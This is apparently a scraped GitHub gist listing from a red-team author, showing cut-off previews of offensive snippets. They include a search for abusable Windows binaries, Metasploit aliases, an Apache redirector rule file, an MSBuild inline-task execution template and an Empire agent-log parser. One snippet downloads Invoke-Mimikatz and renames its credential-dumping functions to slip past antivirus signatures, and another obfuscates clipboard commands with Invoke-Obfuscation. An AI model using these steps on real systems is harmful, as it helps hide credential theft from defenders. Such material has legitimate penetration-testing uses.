Skip to content

Instantly share code, notes, and snippets.

$exepath = "c:\windows"
$searchstrings = @("/url", "/uri", "/wildcard", "/format", "/path")
$skip = @("logoff.exe", "mcrmgr.exe", "audit.exe")
$foundin = @()
$testedbins = @()
Function Execute-Command ($commandPath, $commandArguments)
{
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
$pinfo.FileName = $commandPath
Const HKLM = &H80000002 'HKEY_LOCAL_MACHINE
strComputer = "."
strKey = "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit"
Set objLocator = CreateObject("WbemScripting.SWbemLocator")
Set objReg = objLocator.ConnectServer(strComputer, "root\cimv2").Get("StdRegProv")
objReg.EnumKey HKLM, strKey, arrSubKeys
objReg.GetDWORDValue HKLM, strkey, "ProcessCreationIncludeCmdLine_Enabled", isenabled
If IsNull(isenabled) Then
# Add to your .bashrc. May need to tweak the ifconfig output for your distro.
# Ubuntu
PROMPT_COMMAND='PS1="\[\033[01;34m\][\u.\h \[\033[0;33m\]`ifconfig eth0 2>/dev/null | sed -n 2,2p | cut -d":" -f 2| cut -d" " -f 1`: \[\033[32m\]\`if [[ `pwd|wc -c|tr -d " "` > 18 ]]; then echo "\\W"; else echo "\\w"; fi\`]\$\[\033[0m\] "'
# Kali
PROMPT_COMMAND='PS1="\[\033[01;34m\][\u.\h \[\033[0;33m\]`ifconfig eth1 2>/dev/null | sed -n 2,2p | awk {'"'"'print $2'"'"'}`: \[\033[32m\]\`if [[ `pwd|wc -c|tr -d " "` > 18 ]]; then echo "\\W"; else echo "\\w"; fi\`]\$\[\033[0m\] "'
# AWS EC2
PROMPT_COMMAND='PS1="\[\033[01;34m\][\u.\h \D{%F %T} \[\033[0;33m\]`curl http://169.254.169.254/latest/meta-data/public-ipv4 2>/dev/null`: \[\033[32m\]\`if [[ `pwd|wc -c|tr -d " "` > 18 ]]; then echo "\\W"; else echo "\\w"; fi\`]\n\$\[\033[0m\] "'
set PROMPT %red%L %yel%J %grn%S %blu%W
load nessus
load pentest
load sounds
load alias
alias j "jobs -v"
alias s "sessions -v"
alias -f w "workspace"
alias so "show options"
alias sa "show advanced"
@curi0usJack
curi0usJack / .htaccess
Last active March 13, 2024 10:17
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="Business">
<BusinessTime />
</Target>
<UsingTask
TaskName="BusinessTime"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
# Uncomment below two lines to clean comments from all .ps1 files in ./
#find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \;
#find ./ -name "*.ps1" -exec sed -i -e 's/#.*$//' {} \;
sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1
sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1
sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1
@curi0usJack
curi0usJack / gist:1eef9d94a01344bddafec7434412ec66
Created March 15, 2017 20:20
Obfuscate Command in your Clipboard (even if base64 encoded).
function obs()
{
Import-Module Invoke-Obfuscation
$s = Get-Clipboard
if ($s -eq $null)
{
Write-Host "Clipboard is nulll."
}
@curi0usJack
curi0usJack / parseagentlog.py
Created February 14, 2017 23:12
Parse AD Info from Empire agent.log
#!/usr/bin/env python
# Run this script on the agent.log file after you've run the situational_awareness/network/powerview/get_user module.
# userdata.log file is pipe delimited.
import sys
import os
class User:
UserName = ""